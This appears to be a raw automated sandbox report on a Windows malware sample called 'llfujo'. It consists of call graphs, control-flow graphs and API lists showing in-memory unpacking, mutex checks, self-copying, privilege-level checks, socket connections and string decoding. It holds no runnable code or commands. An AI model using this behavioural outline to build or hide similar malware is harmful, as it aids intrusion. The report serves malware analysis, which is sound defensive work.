866158 3066->3068 3069 866177 3068->3069 3070 866164 3068->3070 3080 86416e 3069->3080 3074 8660d1 3070->3074 3073 866175 3073->3066 3075 8660e7 3074->3075 3076 866140 3075->3076 3079 866108 select 3075->3079 3077 866146 SetEvent 3076->3077 3078 86614e 3076->3078 3077->3078 3078->3073 3079->3075 3079->3076 3081 86418a 3080->3081 3082 864190 WaitForSingleObject 3081->3082 3086 86419a 3081->3086 3082->3086 3083 864287 3084 864295 3083->3084 3085 86428d SetEvent 3083->3085 3084->3073 3085->3084 3086->3083 3089 863866 3086->3089 3098 864474 3086->3098 3090 86331a GetPEB 3089->3090 3091 86388b 3090->3091 3092 8638b7 3091->3092 3093 8637a4 GetPEB 3091->3093 3094 8637a4 GetPEB 3092->3094 3093->3092 3095 8638ca 3094->3095 3096 8637a4 GetPEB 3095->3096 3097 8638e0 3096->3097 3097->3086 3101 86448d 3098->3101 3099 8645a2 3099->3086 3100 8644a0 VirtualAlloc 3100->3099 3100->3101 3101->3099 3101->3100 3102 8660d1 2 API calls 3101->3102 3102->3101 3103 864a0a 3108 864a26 3103->3108 3104 864bb6 ioctlsocket 3105 864bdc 3104->3105 3110 864bb1 3104->3110 3106 864bf2 connect 3105->3106 3107 864be2 connect 3105->3107 3109 864c00 3106->3109 3107->3109 3108->3104 3108->3110 3111 864c15 select 3109->3111 3113 866158 6 API calls 3110->3113 3111->3110 3112 864c30 ioctlsocket WSAIoctl 3111->3112 3112->3110 3118 864ce9 3113->3118 3114 864d6b 3116 866158 6 API calls 3114->3116 3115 864d33 select 3115->3118 3117 864e16 3116->3117 3118->3114 3118->3115 3119 866158 6 API calls 3118->3119 3119->3118 3120 862df7 3121 862e13 3120->3121 3133 862fa2 3121->3133 3123 862e38 3124 862e40 wsprintfA 3123->3124 3127 862ee6 3123->3127 3125 864474 3 API calls 3124->3125 3130 862e75 3125->3130 3126 862e87 select 3126->3127 3126->3130 3129 862f26 VirtualAlloc 3127->3129 3132 862f44 3127->3132 3128 8645a9 3 API calls 3128->3130 3129->3132 3130->3126 3130->3127 3130->3128 3131 864832 VirtualAlloc 3130->3131 3131->3130 3134 862fbe 3133->3134 3141 863268 3134->3141 3144 862a0b 3134->3144 3136 863016 3137 8660d1 2 API calls 3136->3137 3136->3141 3138 8630a8 3137->3138 3139 8630b0 VirtualAlloc 3138->3139 3139->3141 3142 8630cb 3139->3142 3140 8661a4 select 3140->3142 3141->3123 3142->3140 3142->3141 3143 8660d1 2 API calls 3142->3143 3143->3142 3145 862a27 3144->3145 3146 862a9f inet_addr 3145->3146 3147 862b4f 3146->3147 3148 862aad 3146->3148 3147->3136 3149 862ac0 htons ioctlsocket connect 3148->3149 3153 86646f 3149->3153 3152 862b27 ioctlsocket 3152->3147 3154 862b0f select 3153->3154 3154->3147 3154->3152 3155 861250 3175 8664a9 3155->3175 3157 861269 CreateThread GetModuleFileNameA 3176 865fb8 3157->3176 3159 86130c 3162 861334 OpenMutexA CreateMutexA 3159->3162 3160 8612f7 GetPEB 3160->3159 3161 861298 3161->3159 3161->3160 3163 861374 EnumWindows Sleep 3162->3163 3164 861362 3162->3164 3163->3164 3166 861396 3163->3166 3165 8613f9 Sleep 3164->3165 3184 8648fe 3164->3184 3167 866adb ExitProcess 3165->3167 3190 8659f9 3166->3190 3171 8613a4 GetModuleFileNameA 3201 865b1b 3171->3201 3173 8613c8 CopyFileA 3203 865609 3173->3203 3175->3157 3178 865fd4 3176->3178 3177 86606a 3177->3161 3178->3177 3179 866011 LocalFree LocalAlloc GetTokenInformation 3178->3179 3180 86603a 3178->3180 3179->3180 3181 86603e GetSidSubAuthority 3180->3181 3182 86605a LocalFree CloseHandle 3180->3182 3181->3182 3183 86604e 3181->3183 3182->3177 3183->3182 3185 864932 3184->3185 3186 864917 Sleep 3185->3186 3187 864936 3185->3187 3186->3185 3189 8649f4 Sleep 3187->3189 3213 864e35 3187->3213 3189->3187 3192 865a15 3190->3192 3191 8613a0 3191->3165 3191->3171 3192->3191 3193 8668e8 GetPEB 3192->3193 3194 865a6a 3193->3194 3195 8669d8 GetPEB 3194->3195 3197 865a75 3195->3197 3196 865b06 CloseHandle 3196->3191 3197->3196 3198 865ad1 3197->3198 3199 8668e8 GetPEB 3197->3199 3200 8669d8 GetPEB 3197->3200 3198->3196 3199->3197 3200->3197 3202 865b33 3201->3202 3202->3173 3204 865624 3203->3204 3205 86563b CoInitialize 3204->3205 3206 865655 3205->3206 3207 865fb8 6 API calls 3206->3207 3212 865821 3206->3212 3208 865705 3207->3208 3209 8657cb GetLocalTime SystemTimeToFileTime 3208->3209 3208->3212 3210 8657f5 3209->3210 3211 8657fa FileTimeToSystemTime 3209->3211 3210->3211 3211->3212 3212->3165 3214 864e51 3213->3214 3215 864e6a VirtualAlloc 3214->3215 3216 864e88 VirtualAlloc 3214->3216 3217 864e85 3215->3217 3218 865140 3215->3218 3216->3218 3219 864ea3 3216->3219 3217->3216 3220 8662ee GetPEB 3218->3220 3222 864f73 3219->3222 3238 864ec5 3219->3238 3221 86555b 3220->3221 3343 8662ad 3221->3343 3224 862a0b 6 API calls 3222->3224 3226 864f69 3224->3226 3226->3218 3227 864f8f WSAIoctl 3226->3227 3229 864ffd 3227->3229 3228 8668e8 GetPEB 3231 86557d 3228->3231 3328 865f33 3229->3328 3230 864f33 3260 861408 3230->3260 3232 8669d8 GetPEB 3231->3232 3233 865588 3232->3233 3233->3233 3236 8655c5 CloseHandle 3233->3236 3242 8655d9 3236->3242 3238->3230 3241 864f1b inet_addr 3238->3241 3241->3230 3243 8655fc 3242->3243 3246 8655f5 ExitProcess 3242->3246 3243->3187 3244 86503b 3245 866158 6 API calls 3244->3245 3258 865079 3245->3258 3247 8650a7 select 3247->3218 3247->3258 3248 8661f7 10 API calls 3248->3258 3249 866158 6 API calls 3249->3258 3250 865368 VirtualAlloc 3250->3218 3250->3258 3251 8660d1 2 API calls 3251->3258 3252 866158 6 API calls 3253 8652bd GetTempPathA 3252->3253 3253->3258 3254 865425 socket 3254->3258 3255 865418 socket 3255->3258 3256 86545a CreateThread 3256->3258 3258->3218 3258->3247 3258->3248 3258->3249 3258->3250 3258->3251 3258->3252 3258->3254 3258->3255 3258->3256 3259 865609 10 API calls 3258->3259 3339 86687b 3258->3339 3259->3258 3261 861424 3260->3261 3262 8668e8 GetPEB 3261->3262 3263 861454 3262->3263 3264 8669d8 GetPEB 3263->3264 3265 86145f 3264->3265 3266 8668e8 GetPEB 3265->3266 3267 86147a 3266->3267 3268 8669d8 GetPEB 3267->3268 3269 861485 3268->3269 3270 8668e8 GetPEB 3269->3270 3271 8614a0 3270->3271 3272 8669d8 GetPEB 3271->3272 3273 8614ab 3272->3273 3274 8668e8 GetPEB 3273->3274 3275 8614cc 3274->3275 3276 8669d8 GetPEB 3275->3276 3292 8614d7 3276->3292 3277 8662ee GetPEB 3278 86291f 3277->3278 3280 8662ad GetPEB 3278->3280 3281 862956 CryptReleaseContext 3280->3281 3282 862983 3281->3282 3283 862969 3281->3283 3285 8668e8 GetPEB 3282->3285 3284 8668e8 GetPEB 3283->3284 3286 862978 3284->3286 3287 862994 3285->3287 3288 8669d8 GetPEB 3286->3288 3289 8669d8 GetPEB 3287->3289 3288->3282 3290 86299f 3289->3290 3291 8668e8 GetPEB 3290->3291 3293 8629b0 3291->3293 3316 861fa5 3292->3316 3325 86168e 3292->3325 3348 862c95 3292->3348 3294 8669d8 GetPEB 3293->3294 3295 8629bb 3294->3295 3295->3226 3296 862fa2 10 API calls 3296->3325 3297 861791 CryptStringToBinaryA 3360 8648a6 3297->3360 3299 86331a GetPEB 3299->3325 3300 8617c4 CryptStringToBinaryA 3300->3325 3301 8648a6 VirtualAlloc 3301->3325 3302 864474 VirtualAlloc select SetEvent 3302->3325 3303 86278e select 3303->3325 3304 8645a9 VirtualAlloc VirtualAlloc select 3304->3325 3305 86194a inet_addr 3305->3325 3306 862113 CryptStringToBinaryA CryptStringToBinaryA 3306->3325 3307 86196d CryptStringToBinaryA CryptStringToBinaryA 3363 864039 3307->3363 3309 86340e 20 API calls 3309->3325 3310 863765 VirtualAlloc select SetEvent 3310->3325 3311 863866 GetPEB 3311->3325 3312 8647a4 VirtualAlloc select VirtualAlloc select 3312->3325 3313 86288f inet_addr 3314 864474 3 API calls 3313->3314 3314->3325 3315 861aa4 CryptStringToBinaryA CryptStringToBinaryA 3315->3325 3316->3277 3317 861af8 CryptDecodeObject 3317->3325 3318 86233b wsprintfA 3319 863866 GetPEB 3318->3319 3319->3325 3320 8669d8 GetPEB 3320->3325 3321 862401 select 3321->3325 3322 8668e8 GetPEB 3322->3325 3323 8637a4 GetPEB 3323->3325 3324 8662ad GetPEB 3324->3325 3325->3296 3325->3297 3325->3299 3325->3300 3325->3301 3325->3302 3325->3303 3325->3304 3325->3305 3325->3306 3325->3307 3325->3309 3325->3310 3325->3311 3325->3312 3325->3313 3325->3315 3325->3316 3325->3317 3325->3318 3325->3320 3325->3321 3325->3322 3325->3323 3325->3324 3326 8638e7 GetPEB 3325->3326 3369 86397e 3325->3369 3326->3325 3329 865f4f 3328->3329 3330 8668e8 GetPEB 3329->3330 3331 865f6a 3330->3331 3332 8669d8 GetPEB 3331->3332 3333 865002 3332->3333 3334 865f86 3333->3334 3335 8668e8 GetPEB 3334->3335 3336 865f99 3335->3336 3337 8669d8 GetPEB 3336->3337 3338 86500b GetVolumeInformationA 3337->3338 3338->3244 3340 866884 3339->3340 3341 8668b6 SetFilePointer WriteFile CloseHandle 3340->3341 3342 8668e1 3340->3342 3341->3342 3342->3258 3346 8662b8 3343->3346 3344 865568 3344->3228 3344->3233 3345 8668e8 GetPEB 3345->3346 3346->3344 3346->3345 3347 8669d8 GetPEB 3346->3347 3347->3346 3349 862cb1 3348->3349 3350 862a0b 6 API calls 3349->3350 3351 862cca 3350->3351 3352 8660d1 2 API calls 3351->3352 3353 862dd1 3351->3353 3355 862cfe 3352->3355 3353->3292 3354 8661a4 select 3354->3355 3355->3353 3355->3354 3356 862d3e ioctlsocket 3355->3356 3357 862d5b 3356->3357 3357->3353 3357->3356 3358 864868 VirtualAlloc 3357->3358 3359 8661a4 select 3357->3359 3358->3357 3359->3357 3385 8648d1 3360->3385 3362 8648b4 VirtualAlloc 3362->3325 3364 864055 3363->3364 3365 862c95 11 API calls 3364->3365 3367 864092 3365->3367 3366 864155 3366->3325 3367->3366 3368 864137 CryptStringToBinaryA 3367->3368 3368->3366 3371 86399a 3369->3371 3370 863b1c 3370->3325 3371->3370 3372 86331a GetPEB 3371->3372 3373 8639fd 3371->3373 3372->3371 3373->3370 3374 86331a GetPEB 3373->3374 3375 863a2d 3374->3375 3376 86331a GetPEB 3375->3376 3377 863a49 3376->3377 3378 8668e8 GetPEB 3377->3378 3379 863aa9 3378->3379 3380 8669d8 GetPEB 3379->3380 3381 863ab4 3380->3381 3382 8668e8 GetPEB 3381->3382 3383 863b11 3382->3383 3384 8669d8 GetPEB 3383->3384 3384->3370 3386 8648df 3385->3386 3386->3362 3387 862011 3434 86169d 3387->3434 3388 8662ee GetPEB 3389 86291f 3388->3389 3390 8662ad GetPEB 3389->3390 3391 862956 CryptReleaseContext 3390->3391 3392 862983 3391->3392 3393 862969 3391->3393 3395 8668e8 GetPEB 3392->3395 3394 8668e8 GetPEB 3393->3394 3396 862978 3394->3396 3397 862994 3395->3397 3398 8669d8 GetPEB 3396->3398 3399 8669d8 GetPEB 3397->3399 3398->3392 3400 86299f 3399->3400 3401 8668e8 GetPEB 3400->3401 3402 8629b0 3401->3402 3403 8669d8 GetPEB 3402->3403 3411 8629bb 3403->3411 3404 86340e 20 API calls 3404->3434 3405 862fa2 10 API calls 3405->3434 3406 861791 CryptStringToBinaryA 3407 8648a6 VirtualAlloc 3406->3407 3407->3434 3408 864474 VirtualAlloc select SetEvent 3408->3434 3409 8617c4 CryptStringToBinaryA 3409->3434 3410 8648a6 VirtualAlloc 3410->3434 3412 863765 VirtualAlloc select SetEvent 3412->3434 3413 86278e select 3413->3434 3414 8645a9 VirtualAlloc VirtualAlloc select 3414->3434 3415 86194a inet_addr 3415->3434 3416 862113 CryptStringToBinaryA CryptStringToBinaryA 3416->3434 3417 86196d CryptStringToBinaryA CryptStringToBinaryA 3418 864039 12 API calls 3417->3418 3418->3434 3419 863866 GetPEB 3419->3434 3420 8647a4 VirtualAlloc select VirtualAlloc select 3420->3434 3421 86288f inet_addr 3422 864474 3 API calls 3421->3422 3422->3434 3423 861aa4 CryptStringToBinaryA CryptStringToBinaryA 3423->3434 3424 861fa5 3424->3388 3425 861af8 CryptDecodeObject 3425->3434 3426 86233b wsprintfA 3427 863866 GetPEB 3426->3427 3427->3434 3428 8669d8 GetPEB 3428->3434 3429 862401 select 3429->3434 3430 86331a GetPEB 3430->3434 3431 8668e8 GetPEB 3431->3434 3432 8637a4 GetPEB 3432->3434 3433 8662ad GetPEB 3433->3434 3434->3404 3434->3405 3434->3406 3434->3408 3434->3409 3434->3410 3434->3412 3434->3413 3434->3414 3434->3415 3434->3416 3434->3417 3434->3419 3434->3420 3434->3421 3434->3423 3434->3424 3434->3425 3434->3426 3434->3428 3434->3429 3434->3430 3434->3431 3434->3432 3434->3433 3435 8638e7 GetPEB 3434->3435 3436 86397e GetPEB 3434->3436 3435->3434 3436->3434 2932 86003c 2933 860049 2932->2933 2947 860df8 SetErrorMode SetErrorMode 2933->2947 2937 860238 VirtualAlloc 2938 860265 2937->2938 2939 8602ce VirtualProtect 2938->2939 2941 86030b 2939->2941 2940 860439 VirtualFree 2945 8605f4 LoadLibraryA 2940->2945 2946 8604be 2940->2946 2941->2940 2942 8604e3 LoadLibraryA 2942->2946 2944 8608c7 2945->2944 2946->2942 2946->2945 2948 860223 2947->2948 2949 860d90 2948->2949 2950 860dad 2949->2950 2951 860db6 2950->2951 2952 860dbb GetPEB 2950->2952 2951->2937 2953 860ddc 2952->2953 2953->2937 3437 865ddb 3438 865df4 3437->3438 3439 865e83 CreateWindowExA 3438->3439 3440 865eca 3439->3440 3441 865ed2 GetMessageA TranslateMessage DispatchMessageA 3440->3441 3441->3441 3442 865ef9 3443 865f18 3442->3443 3444 865f05 3442->3444 3445 866adb ExitProcess 3443->3445

                        Callgraph

                        • Executed
                        • Not Executed
                        • Opacity -> Relevance
                        • Disassembly available
                        callgraph 0 Function_00865F86 37 Function_008669D8 0->37 42 Function_008668E8 0->42 1 Function_00866F84 2 Function_0086628E 3 Function_00865B8C 21 Function_008664A9 3->21 40 Function_008666E2 3->40 48 Function_008666FD 3->48 63 Function_00866809 3->63 4 Function_0040DB50 5 Function_0040F550 5->4 13 Function_0040DD60 5->13 87 Function_0040D980 5->87 98 Function_0040D9A0 5->98 6 Function_00862C95 6->2 16 Function_008661A4 6->16 6->21 33 Function_008660D1 6->33 34 Function_008648D1 6->34 61 Function_00862A0B 6->61 69 Function_00866422 6->69 104 Function_00864868 6->104 7 Function_00868290 8 Function_00860D90 9 Function_0040D958 10 Function_00867A9F 11 Function_0086429C 11->21 22 Function_008645A9 11->22 11->34 39 Function_008638E7 11->39 11->69 77 Function_00864832 11->77 96 Function_00866158 11->96 102 Function_0086646F 11->102 12 Function_008648A6 12->34 14 Function_0040DC60 13->14 23 Function_0040DB70 13->23 29 Function_0040DD00 13->29 90 Function_0040DB90 13->90 15 Function_008637A4 15->21 15->37 15->42 16->102 17 Function_008647A4 17->21 17->22 17->34 17->102 18 Function_0040D963 19 Function_00862FA2 19->16 19->21 19->33 19->34 19->61 19->69 20 Function_008662AD 20->37 20->42 22->16 22->21 22->34 22->69 22->77 22->104 24 Function_008666B0 24->40 25 Function_008667B1 25->40 43 Function_008667E8 25->43 26 Function_008663BB 27 Function_00865FB8 27->69 28 Function_008665B8 30 Function_008664C0 30->40 30->69 31 Function_00860CCE 32 Function_00866FD7 33->102 34->21 35 Function_008663DC 36 Function_00865DDB 36->21 36->30 37->21 37->30 37->37 37->42 37->48 38 Function_00860CE7 39->15 39->43 67 Function_0086331A 39->67 39->69 41 Function_008662EE 41->37 41->42 42->21 42->24 42->30 42->37 42->42 44 Function_008661F7 44->11 44->16 45 Function_00862DF7 45->19 45->21 45->22 45->34 45->69 45->77 89 Function_0086624B 45->89 45->102 107 Function_00864474 45->107 46 Function_00865EF5 47 Function_008648FE 47->21 47->30 74 Function_00864E35 47->74 83 Function_0086643A 47->83 48->40 49 Function_00860DF8 50 Function_008663F8 51 Function_00865EF9 95 Function_00865958 51->95 52 Function_008659F9 52->21 52->30 52->37 52->40 52->42 52->48 52->69 53 Function_00863E04 53->21 53->35 54 Function_00860005 73 Function_0086092B 54->73 82 Function_0086003C 54->82 55 Function_00864A03 56 Function_00867200 57 Function_00860001 57->73 57->82 58 Function_0086340E 58->15 58->17 58->21 58->35 58->43 58->63 58->67 58->69 72 Function_00863B2A 58->72 58->83 58->107 109 Function_0086397E 58->109 59 Function_00860D0C 60 Function_00864A0A 60->2 60->21 60->34 65 Function_00865D13 60->65 60->69 71 Function_0086632F 60->71 60->96 60->102 61->21 61->26 61->30 61->69 61->71 61->83 61->102 62 Function_00861408 62->6 62->12 62->15 62->17 62->19 62->20 62->21 62->22 62->25 62->28 62->30 62->34 62->35 62->37 62->39 62->40 62->41 62->42 62->53 62->58 62->63 62->67 62->69 80 Function_00863F31 62->80 62->83 85 Function_00864039 62->85 62->89 97 Function_00863866 62->97 100 Function_00863765 62->100 62->102 106 Function_00866777 62->106 62->107 62->109 111 Function_00863E7A 62->111 113 Function_00863F79 62->113 64 Function_00865609 64->21 64->24 64->27 64->30 64->95 65->21 66 Function_00862011 66->12 66->15 66->17 66->19 66->20 66->21 66->22 66->25 66->28 66->30 66->34 66->35 66->37 66->39 66->40 66->41 66->42 66->53 66->58 66->63 66->67 66->69 66->80 66->83 66->85 66->89 66->97 66->100 66->102 66->106 66->107 66->109 66->111 66->113 67->37 67->41 67->42 67->69 68 Function_00865B1B 68->40 68->63 70 Function_00860920 71->21 72->15 72->20 72->21 72->35 72->37 72->40 72->42 72->53 72->63 72->69 78 Function_00866632 72->78 72->85 73->59 76 Function_00860D35 73->76 74->0 74->20 74->21 74->33 74->34 74->37 74->41 74->42 74->43 74->44 74->50 74->61 74->62 74->63 74->64 74->65 74->69 79 Function_00865F33 74->79 74->89 93 Function_00862B5C 74->93 74->95 74->96 74->102 112 Function_0086687B 74->112 75 Function_00866735 94 Function_00866758 75->94 110 Function_00860D7C 76->110 77->69 77->104 79->21 79->37 79->42 80->113 81 Function_00860A3F 82->8 82->31 82->38 82->49 82->81 105 Function_00860A69 82->105 84 Function_0086683A 85->6 85->21 85->25 85->34 85->69 85->84 86 Function_00868446 88 Function_00864443 88->22 88->34 88->39 88->69 88->77 88->96 88->102 89->2 91 Function_00861250 91->21 91->27 91->47 91->52 91->63 91->64 91->68 108 Function_00866072 91->108 92 Function_00866E50 93->21 93->40 93->69 93->83 95->21 95->24 95->30 96->33 101 Function_0086416E 96->101 97->15 97->67 97->69 99 Function_0040F7A0 99->5 100->21 100->107 101->21 101->69 101->97 101->107 103 Function_00864D6D 103->2 103->34 103->65 103->96 103->102 104->34 104->69 106->25 106->40 107->21 107->33 107->34 107->69 108->21 108->24 108->75 109->21 109->37 109->42 109->43 109->53 109->67 109->69 111->21 111->69 111->83 113->43

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 0 86003c-860047 1 86004c-860263 call 860a3f call 860df8 call 860d90 VirtualAlloc 0->1 2 860049 0->2 17 860265-860289 call 860a69 1->17 18 86028b-860292 1->18 2->1 22 8602ce-8603c2 VirtualProtect call 860cce call 860ce7 17->22 19 8602a1-8602b0 18->19 21 8602b2-8602cc 19->21 19->22 21->19 29 8603d1-8603e0 22->29 30 8603e2-860437 call 860ce7 29->30 31 860439-8604b8 VirtualFree 29->31 30->29 33 8605f4-8605fe 31->33 34 8604be-8604cd 31->34 36 860604-86060d 33->36 37 86077f-860789 33->37 35 8604d3-8604dd 34->35 35->33 41 8604e3-860505 LoadLibraryA 35->41 36->37 42 860613-860637 36->42 39 8607a6-8607b0 37->39 40 86078b-8607a3 37->40 44 8607b6-8607cb 39->44 45 86086e-8608be LoadLibraryA 39->45 40->39 46 860517-860520 41->46 47 860507-860515 41->47 48 86063e-860648 42->48 49 8607d2-8607d5 44->49 52 8608c7-8608f9 45->52 50 860526-860547 46->50 47->50 48->37 51 86064e-86065a 48->51 53 8607d7-8607e0 49->53 54 860824-860833 49->54 55 86054d-860550 50->55 51->37 56 860660-86066a 51->56 57 860902-86091d 52->57 58 8608fb-860901 52->58 59 8607e4-860822 53->59 60 8607e2 53->60 64 860839-86083c 54->64 61 860556-86056b 55->61 62 8605e0-8605ef 55->62 63 86067a-860689 56->63 58->57 59->49 60->54 65 86056f-86057a 61->65 66 86056d 61->66 62->35 67 860750-86077a 63->67 68 86068f-8606b2 63->68 64->45 69 86083e-860847 64->69 71 86057c-860599 65->71 72 86059b-8605bb 65->72 66->62 67->48 73 8606b4-8606ed 68->73 74 8606ef-8606fc 68->74 75 86084b-86086c 69->75 76 860849 69->76 83 8605bd-8605db 71->83 72->83 73->74 77 8606fe-860748 74->77 78 86074b 74->78 75->64 76->45 77->78 78->63 83->55
                        APIs
                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0086024D
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.570219919.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_860000_llfujo.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocVirtual
                        • String ID: cess$kernel32.dll
                        • API String ID: 4275171209-1230238691
                        • Opcode ID: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
                        • Instruction ID: a674808c53c304cfb92e66001fc9b1103b688bc5da09f1356f6c0807d8b00ea4
                        • Opcode Fuzzy Hash: 1bc5c981d6fea912fcc7dcc340e60fde74e519195c6ec5c7e407c243dd4fdd56
                        • Instruction Fuzzy Hash: 13526874A012299FDB64CF58C985BA9BBB1BF09304F1580E9E90DAB351DB30AE84DF15
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 84 40f550-40f57f 86 40f581-40f587 84->86 87 40f589 86->87 88 40f58f-40f595 86->88 87->88 89 40f597-40f59d 88->89 90 40f5af-40f5b6 88->90 89->90 91 40f59f-40f5a5 89->91 90->86 92 40f5b8 90->92 91->90 93 40f5a7-40f5ad 91->93 94 40f5ee-40f746 GlobalAlloc 92->94 93->90 95 40f5ba-40f5c4 93->95 102 40f768 call 40d980 94->102 103 40f748-40f74d 94->103 95->94 97 40f5c6-40f5e6 95->97 97->94 106 40f76d-40f794 call 40dd60 call 40d9a0 call 40d970 102->106 105 40f750-40f756 103->105 107 40f758 105->107 108 40f75e-40f766 call 40db50 105->108 107->108 108->102 108->105
                        APIs
                        • GlobalAlloc.KERNELBASE(00000000,00847C14), ref: 0040F6C6
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.570156343.000000000040A000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040A000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_40a000_llfujo.jbxd
                        Similarity
                        • API ID: AllocGlobal
                        • String ID: ![$@R
                        • API String ID: 3761449716-3143744918
                        • Opcode ID: 4ddd8694687c28b8444426dd6c555b5ae585839390be9013c3db5c396f0f1c9b
                        • Instruction ID: 98098615c7e61e3209297b63cb06055a76a04939ce80bd2ecad00045fb544937
                        • Opcode Fuzzy Hash: 4ddd8694687c28b8444426dd6c555b5ae585839390be9013c3db5c396f0f1c9b
                        • Instruction Fuzzy Hash: 7E5103349042909BD310DF64ED48B963BA1FBAA304F00543AE559E73F1D7B9498AC7BE
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 118 860df8-860e0d SetErrorMode * 2 119 860e14-860e15 118->119 120 860e0f 118->120 120->119
                        APIs
                        • SetErrorMode.KERNELBASE(00000400,?,?,00860223,?,?), ref: 00860E02
                        • SetErrorMode.KERNELBASE(00000000,?,?,00860223,?,?), ref: 00860E07
                        Memory Dump Source
                        • Source File: 00000001.00000002.570219919.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_860000_llfujo.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorMode
                        • String ID:
                        • API String ID: 2340568224-0
                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                        • Instruction ID: d645ef7b6af48f12e870c34ed1b5640e3bd74d96dc479c3fbf86ac33cd21b16b
                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                        • Instruction Fuzzy Hash: 3AD0123114512C77D7402A94DC09BCE7B1CDF05B67F008051FB0DD9181C771994046E9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 121 40d980-40d99c VirtualProtect
                        APIs
                        • VirtualProtect.KERNELBASE(0083F730,00847C14,00000040), ref: 0040D995
                        Memory Dump Source
                        • Source File: 00000001.00000002.570156343.000000000040A000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040A000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_40a000_llfujo.jbxd
                        Similarity
                        • API ID: ProtectVirtual
                        • String ID:
                        • API String ID: 544645111-0
                        • Opcode ID: d4c84bd9978b7fb4b76ac18cd9993b0199ccbdc30b391d2bbd7efd86884b4ca2
                        • Instruction ID: ea5698d955b10bbefbe7e398434c6d4fcd029ac7c9358c260c771c71912e556b
                        • Opcode Fuzzy Hash: d4c84bd9978b7fb4b76ac18cd9993b0199ccbdc30b391d2bbd7efd86884b4ca2
                        • Instruction Fuzzy Hash: 3DC08CF4114100AFD608CB10ED84E2233ACF388300F10492DF282931A0CB30A801CAB8
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        APIs
                        • CreateThread.KERNEL32(00000000,00000000,00405B8B,00405CA9,00000000,00000000), ref: 0086127B
                        • GetModuleFileNameA.KERNEL32(00000000,?,00000100,00000000,00000000,00405B8B,00405CA9,00000000,00000000,?,?,70207369), ref: 0086128E
                          • Part of subcall function 00865FB8: LocalFree.KERNEL32(?,?,00000019,?,?,?,00000000,?,00000000,00000008,?), ref: 00866014
                          • Part of subcall function 00865FB8: LocalAlloc.KERNEL32(00000000,?,?,?,00000019,?,?,?,00000000,?,00000000,00000008,?), ref: 0086601E
                          • Part of subcall function 00865FB8: GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),?,?,?,00000000,?,?,?,00000019,?,?,?,00000000,?,00000000), ref: 00866035
                          • Part of subcall function 00865FB8: GetSidSubAuthority.ADVAPI32(?,00000000,?,TokenIntegrityLevel,?,?,?,00000000,?,?,?,00000019,?,?,?,00000000), ref: 00866045
                          • Part of subcall function 00865FB8: LocalFree.KERNEL32(?,00000000,?,00000004,?,00000000,?,00000019,?,?,?,00000000,?,00000000,00000008,?), ref: 0086605D
                          • Part of subcall function 00865FB8: CloseHandle.KERNEL32(?,?,00000000,?,00000004,?,00000000,?,00000019,?,?,?,00000000,?,00000000,00000008), ref: 00866065
                        • OpenMutexA.KERNEL32(00100000,00000000,llfujo), ref: 00861340
                        • CreateMutexA.KERNEL32(00000000,00000000,llfujo,00100000,00000000,llfujo,00408129,00000000,?,00000100,00000000,00000000,00405B8B,00405CA9,00000000,00000000), ref: 00861354
                        • EnumWindows.USER32(0040593C,00000000), ref: 0086137B
                        • Sleep.KERNEL32(00002710,0040593C,00000000,00002710,0040593C,00000000), ref: 00861385
                        • GetModuleFileNameA.KERNEL32(00000000,?,00000100,0040811D,00002710,0040593C,00000000,00002710,0040593C,00000000), ref: 008613B2
                        • CopyFileA.KERNEL32(?,?,00000000), ref: 008613D8
                        • Sleep.KERNEL32(0000EA60,0040811D,00002710,0040593C,00000000,00002710,0040593C,00000000), ref: 008613FE
                        • ExitProcess.KERNEL32(00000000,0000EA60,0040811D,00002710,0040593C,00000000,00002710,0040593C,00000000), ref: 00866ADD
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.570219919.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_860000_llfujo.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileLocal$CreateFreeModuleMutexNameSleep$AllocAuthorityCloseCopyEnumExitHandleInformationOpenProcessThreadTokenWindows
                        • String ID: llfujo
                        • API String ID: 3825064006-2623408462
                        • Opcode ID: da48f3c4b8f3bb883ace523001b2dd1afccee13f5d8bf6fcda1a97818a6831e3
                        • Instruction ID: 003c2c77f399adabd1d3a4233642bf4d283195a988e00b834c2fc12f3069cfd9
                        • Opcode Fuzzy Hash: da48f3c4b8f3bb883ace523001b2dd1afccee13f5d8bf6fcda1a97818a6831e3
                        • Instruction Fuzzy Hash: 4D418770A80348BAEF30E794CD47F987268FF04B15F164465B744FA2C2EAF456858A5A
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        APIs
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00863B67
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 00863B85
